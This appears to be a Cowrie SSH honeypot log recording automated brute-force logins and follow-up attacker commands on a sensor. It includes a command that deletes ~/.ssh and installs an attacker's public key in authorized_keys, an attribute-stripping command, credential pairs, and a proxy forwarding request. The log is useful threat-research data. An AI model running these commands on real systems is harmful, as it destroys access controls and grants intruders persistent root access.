{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T00:47:43.360071Z","src_ip":"43.156.132.147","session":"eef75fbd49ef"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:47:44.629207Z","src_ip":"43.156.132.147","session":"eef75fbd49ef"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":43226,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c91d1c9824a","protocol":"ssh","message":"New connection: 43.156.132.147:43226 (1.2.3.4:22) [session: 8c91d1c9824a]","sensor":"my-vps","timestamp":"2025-09-09T00:47:44.885675Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:47:44.886497Z","src_ip":"43.156.132.147","session":"8c91d1c9824a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:47:45.142145Z","src_ip":"43.156.132.147","session":"8c91d1c9824a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:47:46.210233Z","src_ip":"43.156.132.147","session":"8c91d1c9824a"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:47:46.463426Z","src_ip":"43.156.132.147","session":"cba438a150cc"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:47:46.464554Z","src_ip":"43.156.132.147","session":"8c91d1c9824a"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":37272,"dst_ip":"1.2.3.4","dst_port":22,"session":"8b54ebf3c04a","protocol":"ssh","message":"New connection: 152.32.129.236:37272 (1.2.3.4:22) [session: 8b54ebf3c04a]","sensor":"my-vps","timestamp":"2025-09-09T00:48:24.530771Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:48:24.531983Z","src_ip":"152.32.129.236","session":"8b54ebf3c04a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:48:24.738855Z","src_ip":"152.32.129.236","session":"8b54ebf3c04a"}
{"eventid":"cowrie.login.failed","username":"cloud","password":"123","message":"login attempt [cloud/123] failed","sensor":"my-vps","timestamp":"2025-09-09T00:48:25.604305Z","src_ip":"152.32.129.236","session":"8b54ebf3c04a"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:48:26.811891Z","src_ip":"152.32.129.236","session":"8b54ebf3c04a"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":53412,"dst_ip":"1.2.3.4","dst_port":22,"session":"831103a4fa35","protocol":"ssh","message":"New connection: 103.100.209.195:53412 (1.2.3.4:22) [session: 831103a4fa35]","sensor":"my-vps","timestamp":"2025-09-09T00:48:39.763722Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:48:39.771484Z","src_ip":"103.100.209.195","session":"831103a4fa35"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:48:39.972677Z","src_ip":"103.100.209.195","session":"831103a4fa35"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZ2wsx#EDC","message":"login attempt [root/!QAZ2wsx#EDC] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:48:40.792519Z","src_ip":"103.100.209.195","session":"831103a4fa35"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:48:41.229342Z","src_ip":"103.100.209.195","session":"831103a4fa35"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:48:41.230181Z","src_ip":"103.100.209.195","session":"831103a4fa35"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:48:41.231288Z","src_ip":"103.100.209.195","session":"831103a4fa35"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:48:41.442651Z","src_ip":"103.100.209.195","session":"831103a4fa35"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:48:41.952702Z","src_ip":"103.100.209.195","session":"831103a4fa35"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T00:48:41.953519Z","src_ip":"103.100.209.195","session":"831103a4fa35"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T00:48:42.161679Z","src_ip":"103.100.209.195","session":"831103a4fa35"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:48:42.162606Z","src_ip":"103.100.209.195","session":"831103a4fa35"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":54001,"dst_ip":"1.2.3.4","dst_port":22,"session":"4cfce67d5526","protocol":"ssh","message":"New connection: 103.100.209.195:54001 (1.2.3.4:22) [session: 4cfce67d5526]","sensor":"my-vps","timestamp":"2025-09-09T00:48:42.350569Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:48:42.351419Z","src_ip":"103.100.209.195","session":"4cfce67d5526"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:48:42.553127Z","src_ip":"103.100.209.195","session":"4cfce67d5526"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T00:48:43.387767Z","src_ip":"103.100.209.195","session":"4cfce67d5526"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:48:44.593897Z","src_ip":"103.100.209.195","session":"4cfce67d5526"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":54504,"dst_ip":"1.2.3.4","dst_port":22,"session":"79ca578e159c","protocol":"ssh","message":"New connection: 103.100.209.195:54504 (1.2.3.4:22) [session: 79ca578e159c]","sensor":"my-vps","timestamp":"2025-09-09T00:48:44.797435Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:48:44.800339Z","src_ip":"103.100.209.195","session":"79ca578e159c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:48:45.004093Z","src_ip":"103.100.209.195","session":"79ca578e159c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:48:45.808937Z","src_ip":"103.100.209.195","session":"79ca578e159c"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:48:46.012141Z","src_ip":"103.100.209.195","session":"79ca578e159c"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:48:46.015511Z","src_ip":"103.100.209.195","session":"831103a4fa35"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":33632,"dst_ip":"1.2.3.4","dst_port":22,"session":"e07a864693ba","protocol":"ssh","message":"New connection: 43.156.132.147:33632 (1.2.3.4:22) [session: e07a864693ba]","sensor":"my-vps","timestamp":"2025-09-09T00:48:48.706171Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:48:48.707392Z","src_ip":"43.156.132.147","session":"e07a864693ba"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:48:48.951489Z","src_ip":"43.156.132.147","session":"e07a864693ba"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"0","message":"login attempt [deploy/0] failed","sensor":"my-vps","timestamp":"2025-09-09T00:48:49.970576Z","src_ip":"43.156.132.147","session":"e07a864693ba"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:48:51.217382Z","src_ip":"43.156.132.147","session":"e07a864693ba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":27677,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c4326a00788","protocol":"ssh","message":"New connection: 212.227.235.229:27677 (1.2.3.4:22) [session: 9c4326a00788]","sensor":"my-vps","timestamp":"2025-09-09T00:48:59.351166Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:48:59.352261Z","src_ip":"212.227.235.229","session":"9c4326a00788"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":27988,"dst_ip":"1.2.3.4","dst_port":22,"session":"19592570bbd8","protocol":"ssh","message":"New connection: 212.227.235.229:27988 (1.2.3.4:22) [session: 19592570bbd8]","sensor":"my-vps","timestamp":"2025-09-09T00:48:59.483546Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T00:48:59.484348Z","src_ip":"212.227.235.229","session":"19592570bbd8"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-09T00:48:59.618340Z","src_ip":"212.227.235.229","session":"19592570bbd8"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:49:00.025180Z","src_ip":"212.227.235.229","session":"19592570bbd8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-09T00:49:00.160725Z","session":"19592570bbd8"}
{"eventid":"cowrie.session.connect","src_ip":"5.202.105.236","src_port":33370,"dst_ip":"1.2.3.4","dst_port":22,"session":"dcb23835aa21","protocol":"ssh","message":"New connection: 5.202.105.236:33370 (1.2.3.4:22) [session: dcb23835aa21]","sensor":"my-vps","timestamp":"2025-09-09T00:49:21.760643Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:49:21.761572Z","src_ip":"5.202.105.236","session":"dcb23835aa21"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:49:21.920357Z","src_ip":"5.202.105.236","session":"dcb23835aa21"}
{"eventid":"cowrie.login.success","username":"root","password":"123456Qwe!","message":"login attempt [root/123456Qwe!] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:49:22.574183Z","src_ip":"5.202.105.236","session":"dcb23835aa21"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:49:22.949586Z","src_ip":"5.202.105.236","session":"dcb23835aa21"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:49:22.950328Z","src_ip":"5.202.105.236","session":"dcb23835aa21"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:49:22.951466Z","src_ip":"5.202.105.236","session":"dcb23835aa21"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:49:23.118881Z","src_ip":"5.202.105.236","session":"dcb23835aa21"}
